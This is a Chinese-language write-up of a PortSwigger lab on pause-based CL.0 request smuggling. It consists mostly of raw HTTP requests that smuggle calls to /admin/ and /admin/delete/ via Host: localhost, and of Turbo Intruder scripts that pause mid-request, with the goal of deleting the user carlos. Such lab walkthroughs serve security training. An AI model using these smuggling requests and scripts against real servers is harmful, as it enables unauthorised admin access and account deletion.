专家-浏览器驱动的请求走私-基于暂停的服务端请求走私
# 实验室:基于暂停的服务端请求走私
# 题目
此实验室容易受到 基于暂停的服务端请求走私 的攻击。前端服务器将请求流式传输到后端,后端服务器在某些端点超时后不会关闭连接。
若要解决实验室问题,请确定一个基于暂停的 CL.0 异步向量,将请求走私到后端的/admin管理面板,然后删除carlos用户。
笔记
对于某些 “基于暂停的服务端异步漏洞”,使用 Burp 的核心工具是不足以达成目标的。你必须借助 Turbo Intruder (opens new window) 扩展来完成本次实验。
该实验室基于 PortSwigger Research 发现的真实漏洞。有关更多详细信息,请参阅《浏览器驱动的异步攻击:HTTP 请求走私的新前沿》 (opens new window)。
- name: 实验室-专家
desc: 基于暂停的服务端请求走私 >>
avatar: https://fastly.statically.io/gh/clincat/blog-imgs@main/vuepress/static/imgs/docs/burpsuite-learn/public/lab-logo.png
link: https://portswigger.net/web-security/request-smuggling/browser/pause-based-desync/lab-server-side-pause-based-request-smuggling
bgColor: '#001350'
textColor: '#d112fe'
1
2
3
4
5
6
2
3
4
5
6
# 实操
(目前只有图,文字后面有时间补)
点击 “ACCESS THE LAB” 进入实验室。
POST /login HTTP/1.1
Host: ...
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 27
GET /404 HTTP/1.1
Foo: x
1
2
3
4
5
6
7
8
9
2
3
4
5
6
7
8
9
# Find more example scripts at https://github.com/PortSwigger/turbo-intruder/blob/master/resources/examples/default.py
def queueRequests(target, wordlists):
engine = RequestEngine(endpoint=target.endpoint,
concurrentConnections=1,
requestsPerConnection=100,
pipeline=False
)
for i in range(3, 8):
engine.queue(target.req, pauseMarker=['\r\n\r\n'], pauseTime=120000)
followUp = 'GET / HTTP/1.1\r\nHost: 0a3500d2042acb67804d3fa300950065.web-security-academy.net\r\n\r\n'
engine.queue(followUp)
def handleResponse(req, interesting):
table.add(req)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
...
GET /admin/ HTTP/1.1
Foo: x
1
2
3
4
5
2
3
4
5
POST /login HTTP/1.1
Host: ...
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 66
GET /admin/ HTTP/1.1
Host: localhost
Content-Length: 75
x=y
1
2
3
4
5
6
7
8
9
10
11
12
2
3
4
5
6
7
8
9
10
11
12
# Find more example scripts at https://github.com/PortSwigger/turbo-intruder/blob/master/resources/examples/default.py
def queueRequests(target, wordlists):
engine = RequestEngine(endpoint=target.endpoint,
concurrentConnections=1,
requestsPerConnection=100,
pipeline=False
)
for i in range(3, 8):
engine.queue(target.req, pauseBefore=-66, pauseTime=120000)
followUp = 'GET / HTTP/1.1\r\nHost: 0a3500d2042acb67804d3fa300950065.web-security-academy.net\r\n\r\n'
engine.queue(followUp)
def handleResponse(req, interesting):
table.add(req)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
2
3
4
5
6
7
8
9
10
11
12
13
14
15
csrf=ryimjPkyidxq1TnsepMemdLIClik7GrB&username=carlos
1
...
Content-Length: 129
POST /admin/delete/ HTTP/1.1
Host: localhost
Content-Length: 132
csrf=ryimjPkyidxq1TnsepMemdLIClik7GrB&username=carlos&x=y
1
2
3
4
5
6
7
8
9
2
3
4
5
6
7
8
9
编辑 (opens new window)